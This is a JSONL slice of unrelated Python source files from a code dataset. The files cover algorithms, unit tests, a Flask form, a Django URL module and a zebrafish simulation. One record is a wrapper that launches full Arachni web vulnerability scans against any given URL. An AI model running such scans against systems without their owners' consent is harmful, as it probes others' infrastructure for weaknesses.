1600)\n","sub_path":"Lectio05/lista_impianti.py","file_name":"lista_impianti.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"618441712","text":"def substring_index(s, sub):\n \"\"\"\n function to tell is substring in string and if yes then return the starting index\n :param s: full string\n :param sub: substring to be checked\n :return: -1 if not there else starting index of the substring\n \"\"\"\n index = s.find(sub)\n return index\n\n\ns = input(\"Enter the string: \")\nsub = input(\"Enter the substring to find: \")\nresult = substring_index(s, sub)\nif result == -1:\n print(\"Substring not found\")\nelse:\n print(\"substring found at index\", result)\n","sub_path":"string_manipulations/find2.py","file_name":"find2.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"238092609","text":"class Solution:\n \"\"\"\n @param nums: A set of numbers.\n @return: A list of lists. All valid subsets.\n \"\"\"\n def subsetsWithDup(self, nums):\n # write your code here\n nums.sort()\n results = []\n self.dfs(nums, 0, [], results)\n return results\n\n def dfs(self, nums, start_idx, subset, results):\n results.append(list(subset))\n\n for i in range(start_idx, len(nums)):\n if i != 0 and nums[i] == nums[i-1] and i > start_idx:\n continue\n subset.append(nums[i])\n self.dfs(nums, i+1, subset, results)\n subset.pop()\n\n\n\ndef main():\n nums = [] # [1, 2, 2]\n sol = Solution()\n results = sol.subsetsWithDup(nums)\n print(results)\n\n\nmain()\n","sub_path":"lint-018-subsets-ii/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"471044284","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import (\n print_function,\n division,\n absolute_import)\nfrom six.moves import xrange\n\n# =============================================================================\n# Imports\n# =============================================================================\n\nfrom numpy.testing import (\n assert_array_equal,\n assert_array_less,\n assert_allclose,\n assert_array_max_ulp,\n assert_array_almost_equal_nulp)\nimport unittest\n\nimport os\nimport numpy as np\n\n# =============================================================================\n# Module variables\n# =============================================================================\n\n# =============================================================================\n# Functions\n# =============================================================================\n\n\ndef load_test_data():\n from kamrecsys.data import EventWithScoreData\n from kamrecsys.datasets import SAMPLE_PATH\n\n infile = os.path.join(SAMPLE_PATH, 'pci.event')\n dtype = np.dtype([('event', 'U18', 2), ('score', np.float)])\n x = np.genfromtxt(fname=infile, delimiter='\\t', dtype=dtype)\n data = EventWithScoreData(n_otypes=2, n_stypes=1,\n event_otypes=np.array([0, 1]))\n data.set_events(x['event'], x['score'], score_domain=(1.0, 5.0, 0.5))\n return data, x\n\n\n# =============================================================================\n# Test Classes\n# =============================================================================\n\n\nclass TestEventUtilMixin(unittest.TestCase):\n\n def test_to_eid_event(self):\n data, x = load_test_data()\n\n # test to_eid_event\n check = data.to_eid_event(data.event)\n assert_array_equal(x['event'], check)\n\n # test to_eid_event / per line conversion\n check = np.empty_like(data.event, dtype=x['event'].dtype)\n for i, j in enumerate(data.event):\n check[i, :] = data.to_eid_event(j)\n assert_array_equal(x['event'], check)\n\n def test_to_iid_event(self):\n from kamrecsys.data import EventWithScoreData\n data, x = load_test_data()\n\n # test EventData.to_iid_event\n assert_array_equal(data.event, data.to_iid_event(x['event']))\n\n # test EventData.to_iid_event / per line conversion\n check = np.empty_like(x['event'], dtype=np.int)\n for i, j in enumerate(x['event']):\n check[i, :] = data.to_iid_event(j)\n assert_array_equal(data.event, check)\n\n\nclass TestEventWithScoreData(unittest.TestCase):\n\n def test_set_events(self):\n data, x = load_test_data()\n\n # test info related to scores\n assert_allclose(data.score[:5], [3., 4., 3.5, 5., 3.])\n assert_allclose(data.score_domain, [1.0, 5.0, 0.5])\n self.assertEqual(data.n_scores, 1)\n self.assertEqual(data.n_score_levels, 9)\n\n def test_digitize_score(self):\n data, x = load_test_data()\n\n digitized_scores = data.digitize_score()\n assert_array_equal(digitized_scores[:5], [4, 6, 5, 8, 4])\n assert_array_equal(digitized_scores[-5:], [4, 3, 4, 5, 6])\n\n digitized_scores = data.digitize_score(np.linspace(1.0, 5.0, 9))\n assert_array_equal(digitized_scores, np.arange(9))\n\n# =============================================================================\n# Main Routines\n# =============================================================================\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"kamrecsys/data/tests/test_event.py","file_name":"test_event.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"83754486","text":"import re\nimport pandas\n\ndef read_txt(filepath):\n with open(filepath,'r',encoding='utf-8') as f:\n return f.read()\n\ndef parse_line(line):\n flag=re.findall('^input|^output',line)\n if flag:\n \n print(line)\n \n record={}\n\n portname=re.sub('(input|output|//.*|\\[.*?\\]| |,)','',line)\n print(portname)\n if portname:\n record['PortName']=portname\n record['HCMSingalname']=portname+'_wire'\n\n reg = r'(`ifdef.*?)\\n' + '.*' + line + r'.*endif'\n reg = reg.replace('[', '\\[').replace(']', '\\]')\n if re.findall(reg,txt,re.S):\n record['备注']=re.findall(reg,txt,re.S)[0]\n else:\n record['备注']=None\n \n type_io=flag[0]\n \n record['input/output']=type_io\n if type_io=='input': \n record['Source']=None\n record['Destination']=modelname\n \n else:\n record['Source']=modelname\n record['Destination']=None\n\n description=re.findall('(//.*?$)',line)\n if description:\n record['描述']=description[0]\n else:\n record['描述']=None\n \n width=re.findall('\\[(.*?)\\]',line)\n if width:\n if re.findall('^(\\d+):(\\d+)$',width[0]):\n a,b=re.findall('^(\\d+):(\\d+)$',width[0])[0]\n a,b=int(a),int(b)\n record['PortWidthSource']=a-b+1\n\n if re.findall('^.*?-\\d+:\\d+$',width[0]):\n record['PortWidthSource']=width[0]\n else:\n \n record['PortWidthSource']=1\n\n print(record)\n return(record)\n else:\n return None\n\n\n\ncolumns=['PortName','input/output','PortWidthSource','Source','Destination','HCMSingalname','描述','备注']\n\n\nrecords=[]\n\ntxt=read_txt(filepath='AX.v')\nlines=txt.split('\\n')\n\n\nmodelname=re.findall('module (.*?)\\(',txt)\nif modelname:\n modelname=modelname[0]\nfor line in lines:\n record=parse_line(line)\n if record:\n records.append(record)\n\ndf=pandas.DataFrame(records)\ndf=df.reindex(columns=columns)\n\ndf.to_excel('out.xlsx',index=None,encoding='utf-8-sig')\n\n\n\n","sub_path":"job/囧-正则提取数据/正则提取数据.py","file_name":"正则提取数据.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"182158053","text":"from flask_wtf import Form\nfrom wtforms.fields import StringField, IntegerField, FloatField\nfrom wtforms.fields.html5 import URLField\nfrom wtforms.validators import DataRequired, url\n\nclass MovieDetailsForm(Form):\n title = StringField('title', validators=[DataRequired()])\n year = IntegerField('year')\n rated = StringField('rated')\n released = StringField('released')\n writer = StringField('writer')\n runtime = StringField('runtime')\n genre = StringField('genre')\n director = StringField('director')\n actors = StringField('actors')\n plot = StringField('plot')\n language = StringField('language')\n country = StringField('country')\n awards = StringField('awards')\n poster = URLField('poster', validators=[url()])\n metascore = FloatField('metascore')\n imdb_rating = FloatField('imdb_rating')\n imdb_votes = IntegerField('imdb_votes')\n imdb_id = StringField('imdb_id', validators=[DataRequired()])\n type = StringField('type')","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"134440798","text":"#!/usr/bin/python3\n\nimport json\nimport requests\nimport argparse\nimport arachni_elasticsearch\n\nrequestURL = 'http://127.0.0.1:7331'\nheaders = {'Content-Type': 'application/json', 'Accept-Encoding': None}\n#es = Elasticsearch([{'host': 'localhost', 'port': 9200}])\n\ndef new_scan(scan_url, scan_checks = None):\n if scan_checks is None:\n params = {\"url\":scan_url}\n else:\n params = {\"url\":scan_url, \"checks\":scan_checks}\n\n responseURL = requestURL + \"/scans\"\n response = requests.post(responseURL, data = json.dumps(params),headers=headers)\n return response\n\ndef monitor_scan(scan_id):\n responseURL = requestURL + \"/scans/\" + scan_id\n response = requests.get(responseURL)\n return response\n\ndef retrieve_report(scan_id):\n responseURL = requestURL + \"/scans/\" + scan_id + \"/report.json\"\n response = requests.get(responseURL)\n response.headers = headers\n return response\n\ndef pause_scan(scan_id):\n responseURL = requestURL + \"/scans/\" + scan_id + \"/pause\"\n response = requests.put(responseURL,headers=headers)\n return response\n\ndef resume_scan(scan_id):\n responseURL = requestURL + \"/scans/\" + scan_id + \"/resume\"\n response = requests.put(responseURL,headers=headers)\n return response\n\ndef shutdown_scan(scan_id):\n responseURL = requestURL + \"/scans/\" + scan_id\n response = requests.delete(responseURL,headers=headers)\n return response\n\ndef get_status(scan_id):\n scan_status = monitor_scan(scan_id)\n status_json = scan_status.json()\n return status_json['busy']\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Arachni Web Scanner\")\n parser.add_argument('-u',\"--url\",required=True, help=\"URL to scan\")\n parser.add_argument('-c',\"--checks\", help=\"checks (type '*' to scan all\")\n args = parser.parse_args()\n\n checks = ['*']\n\n url_scan = new_scan(args.url,checks)\n scan_json = url_scan.json()\n scan_id = scan_json['id']\n print(\"Scan ID: \" + scan_id)\n print('Scanning in Progress...')\n\n scan_status = get_status(scan_id)\n\n while scan_status is True:\n scan_status = get_status(scan_id)\n\n arachni_elasticsearch.add_report(scan_id)\n shutdown_scan(scan_id)\n print('Scan ID: ' + scan_id + ' finished.')\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"arachni_python.py","file_name":"arachni_python.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"467011024","text":"from 单科2专业 import majorscore,sggraderemmendation\nfrom grade1 import getrecommendation1\nimport pandas as pd\nfrom 竞赛2专业 import recommand,group_score\nfrom 问卷2专业 import Recommendation_of_Major\n\ndef main():\n province='江苏'\n category='理科'\n college='复旦大学'\n rank=2000\n #major=\"纺织工程(普通类)\" \n gradelist={\"数学\":140,\"语文\":130,\"外语\":120,\"物理\":90,\"化学\":100,\"生物\":90,\"历史\":0,\"政治\":0,\"地理\":0,\"技术\":0}\n exp=[['全国中学生科普科幻作文大赛','全国一等奖'],['全国青少年科学影像大赛','提名奖']]\n #exp=[['全国中学生数学竞赛','国家二等奖'],['中国青少年机器人竞赛','二等奖']]\n answer={1:'A',2:'B',3:'C',4:'D',5:'D',6:'A',7:'B',8:'D',9:'C',10:'D',11:'C',12:'D',13:'C',14:'D',15:'C',16:'C',17:'C',18:'C'}\n result=getr(province, category, college,rank,exp,gradelist,answer)\n\n\ndef getsgscore(province, category, college, rank,exp,gradelist,answer):\n sgscore={} \n gradescore=sggraderemmendation(gradelist,province,category)\n competitionscore=recommand(group_score(exp))\n questionscore=Recommendation_of_Major(answer)\n wg=wc=wq=1/3\n for key,values in gradescore.items():\n sgscore[key]=gradescore[key]*wg+competitionscore[key]*wc+questionscore[key]*wq\n return sgscore\n\n\ndef getr(province, category, college, rank,exp,gradelist,answer):\n \n rrc=getrecommendation1(province, category, college, rank)\n if(rrc==0):\n print(\"我们系统不推荐这个大学\")\n return\n \n sgscore=getsgscore(province, category, college, rank,exp,gradelist,answer)\n result=[]\n for temp in rrc:\n major=temp[-1]\n risk=temp[1]\n r1=temp[0]\n r2=majorscore(major,sgscore)\n \n w1=0.5\n w2=0.5\n \n rl=r1*w1+r2*w2\n \n result.append([rl,risk,major])\n \n result.sort(reverse=True)\n \n for i in range(len(result)):\n result[i]=[result[i][-1],result[i][0],result[i][1]]\n result=pd.DataFrame(result, columns=['专业', '推荐度', '风险值'])\n print(result)\n \n \nif __name__ == '__main__':\n main()","sub_path":"aiC/Presentation/Model/fusion.py","file_name":"fusion.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"571618366","text":"from django import forms\nfrom django.db.models import fields\nfrom .models import *\n\n\nclass RecetaForm(forms.ModelForm):\n class Meta:\n model = Receta\n exclude = ['paciente', 'estado']\n\n def __init__(self, *args, **kwargs):\n super(RecetaForm, self).__init__(*args, **kwargs)\n self.fields['sintoma'].queryset = Sintoma.objects.filter(estado=True)\n self.fields['diagnostico'].queryset = Diagnostico.objects.filter(estado=True)\n self.fields['gabinete'].queryset = EstudioGabinete.objects.filter(estado=True)\n for k, v in self.fields.items():\n self.fields[k].widget.attrs['required'] = \"true\"\n self.fields[k].widget.attrs['class'] = \"form-control\"\n","sub_path":"appconsulta/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628352683","text":"import re\n\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.core.urlresolvers import NoReverseMatch, reverse\nfrom django.utils import six\nfrom django.utils.encoding import iri_to_uri, force_text\nfrom django.utils.functional import memoize, lazy\nfrom django.utils.importlib import import_module\nfrom django.utils.regex_helper import normalize\n\nfrom django_hosts.defaults import host as host_cls\n\n_hostconf_cache = {}\n_hostconf_module_cache = {}\n_host_patterns_cache = {}\n_host_cache = {}\n\n\ndef get_hostconf():\n try:\n return settings.ROOT_HOSTCONF\n except AttributeError:\n raise ImproperlyConfigured(\"Missing ROOT_HOSTCONF setting\")\nget_hostconf = memoize(get_hostconf, _hostconf_cache, 0)\n\n\ndef get_hostconf_module(hostconf=None):\n if hostconf is None:\n hostconf = get_hostconf()\n return import_module(hostconf)\nget_hostconf_module = memoize(get_hostconf_module, _hostconf_module_cache, 1)\n\n\ndef get_host(name):\n for host in get_host_patterns():\n if host.name == name:\n return host\n raise NoReverseMatch(\"No host called '%s' exists\" % name)\nget_host = memoize(get_host, _host_cache, 1)\n\n\ndef get_host_patterns():\n hostconf = get_hostconf()\n module = get_hostconf_module(hostconf)\n try:\n return module.host_patterns\n except AttributeError:\n raise ImproperlyConfigured(\"Missing host_patterns in '%s'\" %\n hostconf)\nget_host_patterns = memoize(get_host_patterns, _host_patterns_cache, 0)\n\n\ndef clear_host_caches():\n global _hostconf_cache, _hostconf_module_cache, _host_patterns_cache, _host_cache\n _hostconf_cache.clear()\n _hostconf_module_cache.clear()\n _host_patterns_cache.clear()\n _host_cache.clear()\n\n\ndef reverse_host(host, args=None, kwargs=None):\n \"\"\"\n Given the host name and the appropriate parameters,\n reverses the host, e.g.::\n\n >>> from django.conf import settings\n >>> settings.ROOT_HOSTCONF = 'mysite.hosts'\n >>> settings.PARENT_HOST = 'example.com'\n >>> from django_hosts.reverse import reverse_host\n >>> reverse_host('with_username', 'jezdez')\n 'jezdez.example.com'\n\n :param name: the name of the host as specified in the hostconf\n :args: the host arguments to use to find a matching entry in the hostconf\n :kwargs: similar to args but key value arguments\n :raises django.core.urlresolvers.NoReverseMatch: if no host matches\n :rtype: reversed hostname\n \"\"\"\n if args and kwargs:\n raise ValueError(\"Don't mix *args and **kwargs in call to reverse()!\")\n\n args = args or ()\n kwargs = kwargs or {}\n\n if not isinstance(host, host_cls):\n host = get_host(host)\n\n unicode_args = [force_text(x) for x in args]\n unicode_kwargs = dict(((k, force_text(v))\n for (k, v) in six.iteritems(kwargs)))\n\n for result, params in normalize(host.regex):\n if args:\n if len(args) != len(params):\n continue\n candidate = result % dict(zip(params, unicode_args))\n else:\n if set(kwargs.keys()) != set(params):\n continue\n candidate = result % unicode_kwargs\n\n if re.match(host.regex, candidate, re.UNICODE): # pragma: no cover\n parent_host = getattr(settings, 'PARENT_HOST', '').lstrip('.')\n if parent_host:\n # only add the parent host when needed (aka www-less domain)\n if candidate and candidate != parent_host:\n candidate = '%s.%s' % (candidate, parent_host)\n else:\n candidate = parent_host\n return candidate\n\n raise NoReverseMatch(\"Reverse host for '%s' with arguments '%s' \"\n \"and keyword arguments '%s' not found.\" %\n (host.name, args, kwargs))\n\n\ndef reverse_full(host, view,\n host_args=None, host_kwargs=None,\n view_args=None, view_kwargs=None):\n \"\"\"\n Given the host and view name and the appropriate parameters,\n reverses the fully qualified URL, e.g.::\n\n >>> from django.conf import settings\n >>> settings.ROOT_HOSTCONF = 'mysite.hosts'\n >>> settings.PARENT_HOST = 'example.com'\n >>> from django_hosts.reverse import reverse_full\n >>> reverse_full('www', 'about')\n '//www.example.com/about/'\n\n You can set the used scheme in the host object.\n\n :param host: the name of the host\n :param view: the name of the view\n :host_args: the host arguments\n :host_kwargs: the host keyed arguments\n :view_args: the arguments of the view\n :view_kwargs: the keyed arguments of the view\n :rtype: fully qualified URL with path\n \"\"\"\n host = get_host(host)\n host_part = reverse_host(host,\n args=host_args,\n kwargs=host_kwargs)\n path_part = reverse(view,\n args=view_args or (),\n kwargs=view_kwargs or {},\n urlconf=host.urlconf)\n return iri_to_uri('%s%s%s' % (host.scheme, host_part, path_part))\n\nreverse_full_lazy = lazy(reverse_full, str)\n","sub_path":"django_hosts/reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":5234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"606452120","text":"# 1. 接收年月日\ndate = input(\"请输入日期:\")\n# 2. 切分年月日\nyear = int(date[0: 4: 1])\nmonth = int(date[4: 6])\nday = int(date[6: 8])\n# 用 \\ 作为代码换行连接符\n#print(\"%s %s %s\" % \\\n# (year, month \\\n# , day))\n# 3. 处理月份,将月份天数存在list中\ndaysNum = 0\nmonths = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n# 4. 如果是闰年,2月改为29天\nif (year % 400 == 0) or ((year % 4 == 0) and (year % 100 != 0)):\n months[1] = 29\n# 5. 累加月份天数\nfor i in range(month - 1):\n daysNum += months[i]\ndaysNum += day\nprint(\"天数:\", daysNum)\n","sub_path":"Hello/day03/天数.py","file_name":"天数.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"443901448","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 25 08:41:10 2017\n\n@author: Yann Roussel and Tuan Bui\nEdited by: Emine Topcu on Sep 2021\n\"\"\"\nfrom collections import Counter\n\nimport Const\nimport json\nimport matplotlib.image as mpimg\nimport numpy as np\n# Import pandas for data saving\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom matplotlib import rcParams, animation\nfrom numpy import zeros\n\nfrom Analysis_tools import angles_\n\ndef saveToJSON(filename, content):\n jscontent = json.dumps(content)\n f = open(filename,\"w\")\n f.write(jscontent)\n f.close()\n\ndef readFromJSON(filename):\n f = open(filename,\"r\")\n jscontent = f.read() \n content = json.loads(jscontent)\n f.close()\n return content\n \n\n# The keys of the LeftValues and RightValues dictionaries are the cell names, like \"IC\", \"MN\" etc\n# The column names in the csv file start with Left_IC, Right_MN, etc and end with cell number\n# There are no gaps between the columns of the same neuron type and side.\n# For each cell type, first left cells, than right cells are saved\ndef saveToCSV(filename, Time, LeftValues, RightValues):\n\n #check for input accuracy - a file name and Time array need to be provided\n if filename is None or Time is None or\\\n dict(LeftValues).keys() != dict(RightValues).keys():\n return\n\n #Sim_data is the pandas dataframe that will be used to save into a .csv\n Sim_data = pd.DataFrame(index=Time)\n for cellname in dict(LeftValues).keys():\n groupValues = LeftValues[cellname]\n numcells = len(groupValues)\n for j in range(0, numcells):\n header_name = 'Left_' + cellname + str(j)\n col_df = pd.DataFrame(index = Time, data = groupValues[j], columns = [header_name])\n Sim_data = pd.concat([Sim_data, col_df], axis= 1)\n groupValues = RightValues[cellname]\n for k in range(0, numcells):\n header_name = 'Right_' + cellname + str(k)\n col_df = pd.DataFrame(index = Time, data = groupValues[k], columns = [header_name])\n Sim_data = pd.concat([Sim_data, col_df], axis= 1)\n\n Sim_data.to_csv(filename, index_label ='Time')\n\n# cell_names is the list of neurons, like \"IC\", \"MN\" etc\n# Assumption 1: The column names in the csv file start with Left_IC, Right_MN, etc and end with cell number\n# Assumption 2: There are no gaps between the columns of the same neuron type and side\ndef readFromCSV(filename, cell_names):\n if filename is None:\n return\n read_data = pd.read_csv(filename)\n\n data_top = list(read_data.columns.values.tolist())\n\n read_sim = np.ascontiguousarray(read_data)\n read_sim = np.transpose(read_sim)\n Time = read_sim[0]\n\n LeftValues = dict()\n RightValues = dict()\n for nt in cell_names:\n #find the columns that start with Left_[neuron type name]\n #enumerate adds the indices to data_top: x[0] refers to the index and x[1] refers to the values \n #matchingcols is a list of index and value tuple, which can be reached by [,0] and [,1] respectively\n matchingcols = list(filter(lambda x: x[1].startswith(\"Left_\" + nt), enumerate(data_top)))\n if len(matchingcols) == 0:\n continue\n next_start = matchingcols[0][0]\n next_end = matchingcols[-1][0]\n LeftValues[nt] = read_sim[next_start:next_end+1]\n\n matchingcols = list(filter(lambda x: x[1].startswith(\"Right_\" + nt), enumerate(data_top)))\n if len(matchingcols) == 0:\n continue\n next_start = matchingcols[0][0]\n next_end = matchingcols[-1][0]\n RightValues[nt] = read_sim[next_start:next_end+1]\n\n return Time, LeftValues, RightValues\n\n\n# nMuscle: the number of somites\n# dt: the discretization time\ndef saveAnimation(filename, nMuscle, VLMuscle, VRMuscle, Time, dt):\n\n if filename is None or nMuscle is None or \\\n VLMuscle is None or VRMuscle is None or \\\n Time is None or dt is None:\n return\n\n # Uncomment the line below if ffmpeg.exe is not already in your system environment variable PATH\n # plt.rcParams['animation.ffmpeg_path'] = \"c:/Program Files/ffmpeg/ffmpeg.exe\" #Change if ffmpeg.exe is in another location\n \n # Calculate the number of time points\n nmax = len(Time)\n ani = angles_(Time, nMuscle, nmax, VRMuscle, VLMuscle, dt)\n ani.save(filename) #, fps=30)#, extra_args=['-vcodec', 'libx264'])\n\n\n#This function creates the multipanel animation combining musculoskeletal model with cell firing\n#Assumption: leftValues and rightValues are dictionaries holding the membrane potential values of neurons and muscle cells\n#The key of the dictionary is the type of neuron (\"IC\", \"MN\", etc) or \"Muscle\"\n#colors is the dictionary holding the color\ndef multipanel_anim(Time, nmax, leftValues, rightValues, leftColors, rightColors, dt, imgfile, title):\n \n plt.rc('lines', linewidth=Const.MULTIPANEL_LINEWIDTH) \n # Change default font to Arial\n rcParams['font.sans-serif'] = \"Arial\"\n # Then, \"ALWAYS use sans-serif fonts\"\n rcParams['font.family'] = \"sans-serif\"\n\n rcParams['mathtext.fontset'] = 'custom'\n rcParams['mathtext.bf'] = 'Arial:italic:bold'\n\n figheight = 9\n figwidth = 15\n plotindex_angles = 133 # On a 1x3 image, 3rd position\n plotindex_diagram = 131 # On a 1x3 image, 1st position\n numofcols = 3\n firingplotinc = 2\n\n if (imgfile is None):\n figwidth = 10\n plotindex_angles = 122 # On a 1x2 image, 2nd position\n numofcols = 2\n firingplotinc = 1\n\n # Declare figure and subplot\n fig = plt.figure(figsize=(figwidth, figheight))\n \n fig_angles = fig.add_subplot(plotindex_angles) # musculoskeletal model\n fig_sublist = dict()\n left_firing = dict()\n right_firing = dict()\n\n nMuscle = len(leftValues['Muscle'][:, 0])\n VLMuscle = leftValues['Muscle']\n VRMuscle = rightValues['Muscle']\n numoffiring = len(list(filter(lambda x: x != 'Muscle', dict(leftValues).keys())))\n\n for k in dict(leftValues).keys():\n if k != \"Muscle\":\n figsub = fig.add_subplot(numoffiring, numofcols, firingplotinc)\n firingplotinc += numofcols\n fig_sublist[k] = figsub\n \n #Declare the various left and right traces to be plotted\n firing, = figsub.plot([], [], lw=1, color = leftColors[k])\n left_firing[k] = firing\n firing, = figsub.plot([], [], lw=1, color = rightColors[k])\n right_firing[k] = firing\n \n\n fig_angles.set_title(title)\n\n if imgfile is not None:\n # insert double coiling diagram\n fig_diagram = fig.add_subplot(plotindex_diagram)\n img = mpimg.imread(imgfile)\n fig_diagram.imshow(img)\n fig_diagram.axis('off')\n\n Muscle_angles, = fig_angles.plot([], [], 'o-', lw=3, color = 'Black')\n Muscle_angles_highlight, = fig_angles.plot([], [], 'o-', lw=3, color = 'Red')\n\n # Allocating arrays for velocity and position\n vel = np.zeros((nMuscle, nmax))\n pos = np.zeros((nMuscle, nmax))\n \n # Setting constants and initial values for vel. and pos.\n khi = 3.0 #damping cste , high khi =0.5/ low = 0.1\n w0 = 2.5 #2.5 #20Hz = 125.6\n vel0 = 0.0\n pos0 = 0.0\n #Wd = w0\n \n for k in range (0,nMuscle):\n vel[k,0] = vel0 #Sets the initial velocity\n pos[k,0] = pos0 #Sets the initial position\n pos[nMuscle-1,0] = 0.0\n for i in range(1,nmax):\n \n vel[k,i] = -(w0**2)*pos[k,i-1]*dt + vel[k,i-1]*(1-(2*dt*khi*w0)) + 0.1*VRMuscle[k,i-1]*dt - 0.1*VLMuscle[k,i-1]*dt\n pos[k,i] = dt*vel[k,i-1] + pos[k,i-1]\n \n ### DYNAMIC PLOTING\n \n x = np.zeros((nMuscle,nmax))\n y = np.zeros((nMuscle,nmax))\n \n for i in range (0,nmax):\n x[0,i] = 0\n y[0,i] = 0\n pos[0,i] = 0\n for k in range (1,nMuscle):\n pos[k,i] = pos[k-1,i] + pos[k,i]\n \n x[k,i] = x[k-1,i] + np.sin(pos[k,i])\n y[k,i] = y[k-1,i] - np.cos(pos[k,i])\n \n #Declare x and y-axis limits for the various figures\n fig_angles.grid()\n fig_angles.set_ylim(-15, 5)\n fig_angles.set_xlim(-10, 10)\n for k in fig_sublist.keys():\n figsub = fig_sublist[k]\n figsub.set_ylim(-80, 20)\n figsub.set_xlim(0, nmax*dt)\n\n # declare time text\n time_template = 'time = %.1fms'\n time_text = fig_angles.text(0.05, 0.1, '', transform=fig_angles.transAxes)\n fig_angles.legend()\n fig_angles.set_xticks([])\n \n for k in fig_sublist.keys():\n figsub = fig_sublist[k]\n #Set up legend\n leg=figsub.legend(handles=[left_firing[k], right_firing[k]], labels=['L '+ k,'R '+ k], loc='upper right', \n handlelength=Const.MULTIPANEL_LINELENGTH, fontsize=Const.MULTIPANEL_SMALLER_SIZE)\n leg.legendHandles[0].set_color(leftColors[k])\n leg.legendHandles[1].set_color(rightColors[k])\n for line in leg.get_lines():\n line.set_linewidth(Const.MULTIPANEL_LINEWIDTH)\n\n figsub.set_ylabel(r\"$\\mathbf{Vm}$\" + \" (mV)\", fontsize= Const.MULTIPANEL_SMALL_SIZE, fontweight=Const.MULTIPANEL_FONT_STYLE) #y-axis title\n figsub.set_ylim([Const.MULTIPANEL_LOWER_Y, Const.MULTIPANEL_UPPER_Y]) #y-axis limits\n # Remove borders\n figsub.spines['top'].set_visible(False)\n figsub.spines['right'].set_visible(False)\n figsub.spines['bottom'].set_visible(False)\n figsub.spines['left'].set_visible(False)\n #Set up ticks\n figsub.tick_params(axis='both', which='both', length=0) \n for item in ([figsub.title, figsub.xaxis.label, figsub.yaxis.label] +\n figsub.get_xticklabels() + figsub.get_yticklabels()):\n item.set_fontsize(Const.MULTIPANEL_SMALL_SIZE)\n figsub.set_yticks([i*50 + -50 for i in range(0,2)])\n figsub.set_xticks([i*5000 for i in range(0,5)])\n figsub.set_xlabel('Time (ms)', fontsize= Const.MULTIPANEL_SMALL_SIZE, fontweight='bold') #x-axis title\n figsub.set_xlim([Time[0], Time[-1]]) #x-axis limits\n \n #This function initializes the animation\n def init():\n Muscle_angles.set_data([], [])\n for k in left_firing.keys():\n left_firing[k].set_data([], [])\n right_firing[k].set_data([], [])\n time_text.set_text('')\n \n #This function drives the animation by updating every time point\n def animate(i):\n \n thisx = [x[k,i] for k in range(nMuscle)]\n thisy = [y[k,i] for k in range(nMuscle)]\n \n Muscle_angles.set_data(thisx, thisy)\n Muscle_angles_highlight.set_data(x[3,i], y[3,i])\n time_text.set_text(time_template % (Time[i]))\n\n for k in left_firing.keys():\n left_firing[k].set_data(Time[0:i], leftValues[k][3, 0:i])\n right_firing[k].set_data(Time[0:i], rightValues[k][3, 0:i])\n\n return Muscle_angles, left_firing, right_firing, time_text\n \n ani = animation.FuncAnimation(fig, animate, np.arange(1, len(Time), 10), \n interval=10, blit=False, init_func=init)\n \n plt.show()\n return ani\n\n#leftValues and rightValues are dictionaries holding membrane potentials of different cell types, multiple cells\n#if onSamePlot = 1: left and right values displayed on the same plot\n#if there is only one neuron type to plot, left will be plotted on the top, right will be plotted on the bottom\n#if there are multiple neuron types to plot, the height is the height for each row\n#colorMode: 0 -> Left and Right colors will be used\n#colorMode: 1 -> Neuron type based colors will be used\ndef plotProgress(tstart, tend, timeArray, leftValues, rightValues, onSamePlot = False, width = 15, height = 5, colorMode = 0):\n\n if dict(leftValues).keys() != dict(rightValues).keys():\n return 0\n \n numofplots = len(dict(leftValues).keys())\n x_axis = timeArray[tstart: tend]\n\n numofrows = numofplots\n numofcols = 1 if onSamePlot else 2\n if numofplots == 1 and not onSamePlot:\n numofrows = 2\n numofcols = 1\n fig, ax = plt.subplots(numofrows, numofcols, sharex=True, figsize=(width, height * numofrows))\n\n rowind = 0\n for k in dict(leftValues).keys():\n\n nCells = len(leftValues[k][:, 0])\n listLeft = leftValues[k]\n listRight = rightValues[k]\n colorLeft = Const.IPSI_COLOR_MAPS[k] if colorMode == 1 else Const.IPSI_COLOR_MAPS['Left']\n colorRight = Const.CONTRA_COLOR_MAPS[k] if colorMode == 1 else Const.CONTRA_COLOR_MAPS['Right']\n\n if numofplots == 1 and onSamePlot:\n ax.plot([0], [0], c=colorLeft(0.5))\n ax.set_title(k)\n for k in range (0, nCells):\n ax.plot(x_axis, listLeft[k,tstart: tend], c=colorLeft((k+1)/nCells)) # adding a color gradiant, darker color -> rostrally located\n ax.plot(x_axis, listRight[k,tstart: tend], 